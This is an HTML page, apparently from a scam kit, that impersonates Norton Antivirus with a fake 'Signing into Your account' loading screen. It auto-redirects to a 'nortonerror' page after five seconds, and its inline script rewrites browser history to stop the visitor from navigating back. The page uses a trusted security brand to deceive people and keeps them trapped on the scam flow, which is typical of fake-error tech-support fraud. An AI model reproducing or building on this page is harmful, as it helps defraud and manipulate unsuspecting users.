<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="utf-8">
  <!-- Redirect after 5 seconds -->
  <meta http-equiv="refresh" content="5;url=../nortonerror.html">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <meta name="description" content="">
  <meta name="author" content="">
  <link rel="icon" href="favicon.html" type="image/x-icon">
  <title>Norton Antivirus</title>

  <style type="text/css">
    .loading-img {
      margin-left: -105px;
      position: absolute;
      top: 10%;
      left: 50%;
      text-align: center;
      height: 420px;
      width: 210px;
    }
    h3 {
      font-weight: 300;
      font-size: 20px;
    }
  </style>
</head>

<body>
  <div class="loading-img">
    <h3>Signing into Your account</h3>
    <img src="images/nortonlogo1.jpg" alt="logo" style="display: block;">
    <img src="images/ajax-loader-big.gif" alt="loading" style="display: block;">
    please wait...
  </div>

  <script>
    // Prevent back navigation
    history.pushState(null, null, location.href);
    window.onpopstate = function () {
      history.go(1);
    };
  </script>
</body>
</html>